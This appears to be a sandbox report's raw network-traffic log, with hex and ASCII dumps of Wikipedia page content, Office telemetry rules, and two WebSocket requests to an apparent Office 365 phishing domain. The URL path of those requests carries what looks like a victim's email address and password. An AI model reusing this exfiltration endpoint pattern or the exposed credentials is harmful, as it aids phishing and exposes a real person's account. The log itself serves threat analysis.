                                                                                                                                                                2024-11-23 19:36:09 UTC16320INData Raw: 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 3b 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 7d 2e 73 75 67 67 65 73 74 69 6f 6e 2d 6c 69 6e 6b 2c 2e 73 75 67 67 65 73 74 69 6f 6e 73 2d 64 72 6f 70 64 6f 77 6e 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67
                                                                                                                                                                Data Ascii: :0;-webkit-box-shadow:0 2px 2px 0 rgba(0,0,0,.2);-moz-box-shadow:0 2px 2px 0 rgba(0,0,0,.2);box-shadow:0 2px 2px 0 rgba(0,0,0,.2);list-style-type:none;word-spacing:normal}.suggestion-link,.suggestions-dropdown{-webkit-box-sizing:border-box;-moz-box-sizing
                                                                                                                                                                2024-11-23 19:36:09 UTC2730INData Raw: 66 65 61 74 75 72 65 64 2c 2e 6a 73 2d 65 6e 61 62 6c 65 64 20 2e 6a 73 6c 31 30 6e 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 6a 73 6c 31 30 6e 2d 76 69 73 69 62 6c 65 20 2e 63 65 6e 74 72 61 6c 2d 66 65 61 74 75 72 65 64 2c 2e 6a 73 6c 31 30 6e 2d 76 69 73 69 62 6c 65 20 2e 6a 73 6c 31 30 6e 7b 6f 70 61 63 69 74 79 3a 31 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 35 32 30 3b 62 61 63 6b
                                                                                                                                                                Data Ascii: featured,.js-enabled .jsl10n{opacity:0}.jsl10n-visible .central-featured,.jsl10n-visible .jsl10n{opacity:1}@media print{body{background-color:transparent}a{color:#000!important;background:none!important;padding:0!important}a:link,a:visited{color:#520;back
                                                                                                                                                                2024-11-23 19:36:09 UTC16320INData Raw: 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6f 76 65 72 6c 61 79 2d 62 61 6e 6e 65 72 2d 6d 61 69 6e 20 2e 66 72 62 2d 68 65 61 64 65 72 2d 6d 69 6e 69 6d 69 7a 65 2d 69 63 6f 6e 7b 77 69 64 74 68 3a 34 30 70 78 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e
                                                                                                                                                                Data Ascii: n:center;align-items:center}.overlay-banner-main .frb-header-minimize-icon{width:40px;height:40px;-moz-border-radius:2px;border-radius:2px;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:cen
                                                                                                                                                                2024-11-23 19:36:09 UTC16320INData Raw: 72 6d 22 20 69 64 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 2f 77 77 77 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 73 65 61 72 63 68 2d 72 65 64 69 72 65 63 74 2e 70 68 70 22 20 64 61 74 61 2d 65 6c 2d 73 65 63 74 69 6f 6e 3d 22 73 65 61 72 63 68 22 3e 0a 3c 66 69 65 6c 64 73 65 74 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 66 61 6d 69 6c 79 22 20 76 61 6c 75 65 3d 22 57 69 6b 69 70 65 64 69 61 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 69 64 64 65 6e 4c 61 6e 67 75 61 67 65 49 6e 70 75 74 22 20 6e 61 6d 65 3d 22 6c 61 6e 67 75 61 67 65 22 20 76 61 6c 75 65 3d 22 65 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 69
                                                                                                                                                                Data Ascii: rm" id="search-form" action="//www.wikipedia.org/search-redirect.php" data-el-section="search"><fieldset><input type="hidden" name="family" value="Wikipedia"><input type="hidden" id="hiddenLanguageInput" name="language" value="en"><div class="search-i
                                                                                                                                                                2024-11-23 19:36:09 UTC128INData Raw: 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 6b 79 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 6b 79 22 20 74 69 74 6c 65 3d 22 4b 79 72 67 79 7a c4 8d 61 22 3e d0 9a d1 8b d1 80 d0 b3 d1 8b d0 b7 d1 87 d0 b0 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 6d 72 6a 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c
                                                                                                                                                                Data Ascii: li><li><a href="//ky.wikipedia.org/" lang="ky" title="Kyrgyza"></a></li><li><a href="//mrj.wikipedia.org/" l
                                                                                                                                                                2024-11-23 19:36:09 UTC16320INData Raw: 61 6e 67 3d 22 6d 6a 72 22 20 74 69 74 6c 65 3d 22 4b 79 72 79 6b 20 4d 61 72 79 22 3e d0 9a d1 8b d1 80 d1 8b d0 ba 20 d0 bc d0 b0 d1 80 d1 8b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 6c 62 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 6c 62 22 3e 4c c3 ab 74 7a 65 62 75 65 72 67 65 73 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 6c 69 6a 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 6c 69 6a 22 3e 4c c3 ac 67 75 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 6c 69 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 6c 69 22 3e 4c 69 6d 62 75 72 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69
                                                                                                                                                                Data Ascii: ang="mjr" title="Kyryk Mary"> </a></li><li><a href="//lb.wikipedia.org/" lang="lb">Ltzebuergesch</a></li><li><a href="//lij.wikipedia.org/" lang="lij">Lgure</a></li><li><a href="//li.wikipedia.org/" lang="li">Limburgs</a></li><li
                                                                                                                                                                2024-11-23 19:36:09 UTC16320INData Raw: 3d 22 74 73 22 3e 58 69 74 73 6f 6e 67 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 76 65 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 76 65 22 3e 54 73 68 69 76 65 6e e1 b8 93 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 67 75 63 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 67 75 63 22 3e 57 61 79 75 75 6e 61 69 6b 69 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 2f 61 64 79 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 22 20 6c 61 6e 67 3d 22 61 64 79 22 3e d0 b0 d0 b4 d1 8b d0 b3 d0 b0 d0 b1 d0 b7 d1 8d 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 6e
                                                                                                                                                                Data Ascii: ="ts">Xitsonga</a></li><li><a href="//ve.wikipedia.org/" lang="ve">Tshivena</a></li><li><a href="//guc.wikipedia.org/" lang="guc">Wayuunaiki</a></li><li><a href="//ady.wikipedia.org/" lang="ady"></a></li></ul></div><div class="lan
                                                                                                                                                                2024-11-23 19:36:09 UTC1822INData Raw: 6d 61 6c 6c 3e 0a 3c 2f 70 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 72 74 6c 4c 61 6e 67 73 20 3d 20 5b 27 61 72 27 2c 27 61 72 63 27 2c 27 61 72 79 27 2c 27 61 72 7a 27 2c 27 62 63 63 27 2c 27 62 67 6e 27 2c 27 62 71 69 27 2c 27 63 6b 62 27 2c 27 64 76 27 2c 27 66 61 27 2c 27 67 6c 6b 27 2c 27 68 65 27 2c 27 6b 6b 2d 63 6e 27 2c 27 6b 6b 2d 61 72 61 62 27 2c 27 6b 68 77 27 2c 27 6b 73 27 2c 27 6b 75 2d 61 72 61 62 27 2c 27 6c 6b 69 27 2c 27 6c 75 7a 27 2c 27 6d 7a 6e 27 2c 27 6e 71 6f 27 2c 27 70 6e 62 27 2c 27 70 73 27 2c 27 73 64 27 2c 27 73 64 68 27 2c 27 73 6b 72 27 2c 27 75 67 27 2c 27 75 72 27 2c 27 79 69 27 5d 2c 0a 20 20 20 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 48 61 73 68 20 3d 20 27 66 32 61 30 30 36 64 30 27
                                                                                                                                                                Data Ascii: mall></p></footer><script>var rtlLangs = ['ar','arc','ary','arz','bcc','bgn','bqi','ckb','dv','fa','glk','he','kk-cn','kk-arab','khw','ks','ku-arab','lki','luz','mzn','nqo','pnb','ps','sd','sdh','skr','ug','ur','yi'], translationsHash = 'f2a006d0'


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.44977387.120.114.1724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:24 UTC578OUTGET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Sec-WebSocket-Key: QH8dhGI7SeR4WBOG85fjDA==
                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                2024-11-23 19:36:25 UTC206INHTTP/1.1 400 Bad Request
                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                Sec-Websocket-Version: 13
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:25 GMT
                                                                                                                                                                Content-Length: 148
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:36:25 UTC148INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 45 72 72 6f 72 20 55 70 67 72 61 64 69 6e 67 20 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 77 65 62 73 6f 63 6b 65 74 3a 20 74 68 65 20 63 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 75 73 69 6e 67 20 74 68 65 20 77 65 62 73 6f 63 6b 65 74 20 70 72 6f 74 6f 63 6f 6c 3a 20 27 75 70 67 72 61 64 65 27 20 74 6f 6b 65 6e 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 27 43 6f 6e 6e 65 63 74 69 6f 6e 27 20 68 65 61 64 65 72 0a
                                                                                                                                                                Data Ascii: Bad RequestError Upgrading Connection: websocket: the client is not using the websocket protocol: 'upgrade' token not found in 'Connection' header


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.44977487.120.114.1724434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:33 UTC578OUTGET /O365/username/hmoon%40nova.edu/gTZ)sadwg%3Fy3%40tST HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                Origin: http://nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Sec-WebSocket-Key: TINilGYeWC3Xo+UmIqn+Qw==
                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                2024-11-23 19:36:33 UTC206INHTTP/1.1 400 Bad Request
                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                Sec-Websocket-Version: 13
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:33 GMT
                                                                                                                                                                Content-Length: 148
                                                                                                                                                                Connection: close
                                                                                                                                                                2024-11-23 19:36:33 UTC148INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 45 72 72 6f 72 20 55 70 67 72 61 64 69 6e 67 20 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 77 65 62 73 6f 63 6b 65 74 3a 20 74 68 65 20 63 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 75 73 69 6e 67 20 74 68 65 20 77 65 62 73 6f 63 6b 65 74 20 70 72 6f 74 6f 63 6f 6c 3a 20 27 75 70 67 72 61 64 65 27 20 74 6f 6b 65 6e 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 27 43 6f 6e 6e 65 63 74 69 6f 6e 27 20 68 65 61 64 65 72 0a
                                                                                                                                                                Data Ascii: Bad RequestError Upgrading Connection: websocket: the client is not using the websocket protocol: 'upgrade' token not found in 'Connection' header


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                22192.168.2.44977513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:36:38 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:36:39 UTC472INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:39 GMT
                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Cache-Control: public
                                                                                                                                                                Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                                                                                                                                ETag: "0x8DD0BB889D4282C"
                                                                                                                                                                x-ms-request-id: c3062018-b01e-003e-79df-3d8e41000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193638Z-178bfbc474bscnbchC1NYCe7eg00000004z000000000hu93
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_MISS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:36:39 UTC15912INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a
                                                                                                                                                                Data Ascii: " /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e
                                                                                                                                                                Data Ascii: 1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                Data Ascii: > </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a
                                                                                                                                                                Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f
                                                                                                                                                                Data Ascii: "Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerso
                                                                                                                                                                2024-11-23 19:36:39 UTC16384INData Raw: 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30
                                                                                                                                                                Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400
